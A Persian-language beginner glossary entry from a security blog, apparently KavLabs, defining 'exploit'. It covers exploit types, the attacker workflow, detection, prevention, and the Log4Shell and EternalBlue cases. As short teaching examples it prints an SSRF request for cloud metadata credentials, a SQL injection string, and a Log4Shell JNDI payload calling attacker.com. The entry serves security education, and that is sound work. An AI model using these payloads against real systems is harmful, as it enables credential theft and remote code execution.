KavLabs
خانهبلاگ
KavLabs

یادداشت‌هایی از ذهن‌های کاوشگر، برای ذهن‌های کنجکاو

پرهام·پرهام·زال·زال·
· · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · · ·
نوشته‌هادسته‌بندی‌هاجستجوی پیشرفتهلاگ تغییرات

©۲٬۰۲۶ KavLabs — تمام حقوق محفوظ است

ساخته‌شده با عشق توسط پرهام و زال

واژه‌نامه
۰۷ اسفند ۱۴۰۴تکنیک‌های حملهمبتدیزبان: فارسی

بهره‌برداری

مبتدینسخه انگلیسی

یک قطعه کد یا تکنیک که از یک آسیب‌پذیری برای ایجاد رفتار ناخواسته سوءاستفاده می‌کند، مانند دسترسی غیرمجاز یا سرقت داده.

بهره‌برداریآسیب‌پذیریحملهامنیت

تعریف کوتاه

بهره‌برداری (اکسپلویت) همان کد یا روش حمله‌ای است که از یک آسیب‌پذیری استفاده می‌کند. اگر آسیب‌پذیری یک درب قفل‌نشده باشد، بهره‌برداری سارقی است که از آن وارد می‌شود. همان در (آسیب‌پذیری)، سارقان مختلف (بهره‌برداری‌ها) می‌توانند از آن استفاده کنند.

تعریف کامل

بهره‌برداری یک تکنیک، ابزار یا قطعه کد است که از یک آسیب‌پذیری خاص برای رسیدن به هدف مهاجم استفاده می‌کند. آسیب‌پذیری ضعف است؛ بهره‌برداری چگونگی استفاده از آن است.

انواع:

بر اساس هدف:

  • بهره‌برداری از راه دور: از طریق شبکه کار می‌کند
  • بهره‌برداری محلی: نیاز به دسترسی به سیستم دارد
  • سمت کلاینت: نرم‌افزار کاربر را هدف قرار می‌دهد

بر اساس دانش:

  • بهره‌برداری شناخته شده: مستندات عمومی دارد
  • بهره‌برداری روز صفر: هنوز وصله‌ای برای آن وجود ندارد

بر اساس هدف:

  • اثبات مفهوم (PoC): آسیب‌پذیری را نشان می‌دهد
  • سلاح‌سازی شده: ابزار حمله کاملاً کاربردی

اشکال رایج:

  • اسکریپت/کد (Python، JavaScript)
  • درخواست اصلاح‌شده (Burp Suite)
  • ورودی بدشکل
  • فایل با دقت ساخته شده

چرا مهم است

  • آسیب‌پذیری نظری را به خطر واقعی تبدیل می‌کند
  • در دسترس بودن بهره‌برداری ریسک واقعی را تعیین می‌کند
  • بهره‌برداری‌های عمومی منجر به حملات گسترده می‌شوند
  • بازارهای زیرزمینی بهره‌برداری وجود دارد
  • زمان بین افشا و بهره‌برداری در حال کاهش است

چگونه مهاجمان از آن استفاده می‌کنند

گردش کار معمولی:

  1. پیدا کردن آسیب‌پذیری: تحقیق، اسکن، تست
  2. توسعه بهره‌برداری: نوشتن کد برای فعال کردن آن
  3. تست بهره‌برداری: بررسی اینکه کار می‌کند
  4. استقرار: استفاده علیه هدف
  5. رسیدن به هدف: سرقت داده، دسترسی و غیره

مثال‌های واقعی:

بهره‌برداری SSRF:

python
1# بهره‌برداری برای ویژگی واکشی تصویر آسیب‌پذیر
2url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
3payload = {"image_url": url}
4response = requests.post("/api/fetch-image", data=payload)
5credentials = response.json()

بهره‌برداری تزریق SQL:

sql
1# پرس‌وجوی آسیب‌پذیر: SELECT * FROM users WHERE id = '$id'
2# بار حمله:
3id = "1' OR '1'='1"
4# پرس‌وجوی حاصل: SELECT * FROM users WHERE id = '1' OR '1'='1'
5# همه کاربران را برمی‌گرداند

چگونه تشخیص یا پیشگیری کنیم

پیشگیری:

  • وصله کردن سریع آسیب‌پذیری‌ها
  • استفاده از WAF برای مسدود کردن بهره‌برداری‌های شناخته شده
  • اعتبارسنجی و پالایش ورودی
  • اصل کمترین دسترسی
  • تقسیم‌بندی شبکه
  • غیرفعال کردن سرویس‌های غیرضروری

تشخیص:

  • امضاهای IDS/IPS برای بهره‌برداری‌های شناخته شده
  • نظارت بر نشانگرهای بهره‌برداری:
    • الگوهای کاراکتر غیرعادی
    • بارگذاری فایل‌های غیرمنتظره
    • اتصالات شبکه عجیب
    • ناهنجاری‌های فرآیند
  • تحلیل لاگ برای تلاش‌های بهره‌برداری
  • Honeypot برای جذب مهاجمان

پاسخ:

  • جداسازی سیستم‌های آسیب‌دیده
  • مسدود کردن IP مهاجم
  • بررسی لاگ‌ها برای میزان نفوذ
  • اعمال وصله‌های اضطراری
  • بررسی مکانیسم‌های پایداری

باورهای غلط رایج

  • "بهره‌برداری == ویروس" - بهره‌برداری از آسیب‌پذیری‌ها استفاده می‌کند، ویروس‌ها بار هستند
  • "آنتی‌ویروس همه بهره‌برداری‌ها را مسدود می‌کند" - فقط شناخته شده‌ها را
  • "بدون بهره‌برداری عمومی = ایمن" - مهاجمان بهره‌برداری‌های خصوصی دارند
  • "وصله شده = امن" - اگر وصله اعمال نشده باشد، همچنان آسیب‌پذیر است
  • "آسیب‌پذیری‌های پیچیده غیرقابل بهره‌برداری هستند" - فقط زمان می‌برد

مثال واقعی

Log4Shell (CVE-2021-44228)

آسیب‌پذیری: کتابخانه لاگ جاوا دستورات را از پیام‌های لاگ اجرا می‌کرد

بهره‌برداری:

bash
1# مهاجم این را در هدر User-Agent ارسال می‌کند:
2${jndi:ldap://attacker.com/exploit}
3
4# سرور لاگ می‌کند → Log4j پردازش می‌کند → کد مهاجم را دانلود و اجرا می‌کند

تأثیر:

  • میلیون‌ها برنامه را تحت تأثیر قرار داد
  • بهره‌برداری عمومی در ۲۴ ساعت
  • بهره‌برداری آسان (فقط یک درخواست HTTP)
  • اجرای کد از راه دور به دست آمد
  • اسکن گسترده بلافاصله شروع شد

EternalBlue (CVE-2017-0144)

آسیب‌پذیری: نقص پروتکل SMB ویندوز

بهره‌برداری:

  • توسط NSA توسعه یافت
  • توسط Shadow Brokers افشا شد
  • در باج‌افزار WannaCry استفاده شد
  • بیش از ۲۰۰,۰۰۰ کامپیوتر را آلوده کرد
  • میلیاردها دلار خسارت زد

چرا گسترش یافت:

  • بهره‌برداری عمومی در دسترس بود
  • بسیاری از سیستم‌ها وصله نشده بودند
  • انتشار کرم‌مانند
  • بدون نیاز به تعامل کاربر

اصطلاحات مرتبط

Vulnerability, Payload, CVE, Zero-Day, Patch

منابع و مراجع

  • www.cisa.gov/sites/default/files/publications/cybersecurity-glossary.pdf

مفاهیم مرتبط

آسیب‌پذیری روز صفر(Zero-Day)

آسیب‌پذیری امنیتی که هنوز توسط سازنده شناخته یا رفع نشده و مهاجمان می‌توانند از آن سوءاستفاده کنند.